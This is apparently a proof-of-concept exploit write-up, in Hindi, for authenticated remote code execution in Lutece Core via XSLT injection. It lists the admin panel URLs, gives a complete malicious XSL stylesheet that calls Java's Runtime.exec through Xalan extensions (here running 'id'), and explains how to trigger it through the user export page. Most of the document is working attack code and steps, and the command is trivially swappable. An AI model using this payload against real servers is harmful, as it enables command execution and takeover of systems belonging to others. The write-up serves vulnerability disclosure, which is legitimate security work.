
ल्यूटेस कोर में XSLT इंजेक्शन के माध्यम से प्रमाणित रिमोट कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो क्राफ्टेड XSL स्टाइलशीट के माध्यम से कमांड निष्पादन प्रदर्शित करता है।
> स्पष्टीकरण और अधिक जानकारी मेरी वेबसाइट पर <
आपको व्यवस्थापक विशेषाधिकारों वाले खाते की आवश्यकता है।
व्यवस्थापक पैनल पर, XSL निर्यात प्रबंधन पृष्ठ पर जाएं:
/jsp/admin/AdminTechnicalMenu.jsp?tab=xslexportManagement#xslexport
"Add a new transformation sheet" पर क्लिक करें।
पेलोड (सरल id कमांड) के साथ एक .xsl फ़ाइल अपलोड करें:
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
xmlns:proc="http://xml.apache.org/xalan/java/java.lang.Process"
xmlns:is="http://xml.apache.org/xalan/java/java.io.InputStreamReader"
xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader">
<xsl:template match="/">
<xsl:variable name="process" select="rt:exec(rt:getRuntime(), 'id')"/>
<xsl:variable name="inputStream" select="proc:getInputStream($process)"/>
<xsl:variable name="reader" select="is:new($inputStream)"/>
<xsl:variable name="buffereReader" select="br:new($reader)"/>
<xsl:variable name="resultat" select="br:readLine($buffereReader)"/>
<Output>
<xsl:value-of select="$resultat"/>
</Output>
</xsl:template>
</xsl:stylesheet>
नई XSL शीट सहेजें।
उपयोगकर्ता निर्यात पृष्ठ पर जाएं:
/jsp/admin/user/ExportUsers.jsp
हमारे द्वारा अभी बनाई गई ट्रांसफ़ॉर्मेशन शीट चुनें और पुष्टि करें।
id कमांड का परिणाम निर्यात की गई फ़ाइल में होना चाहिए।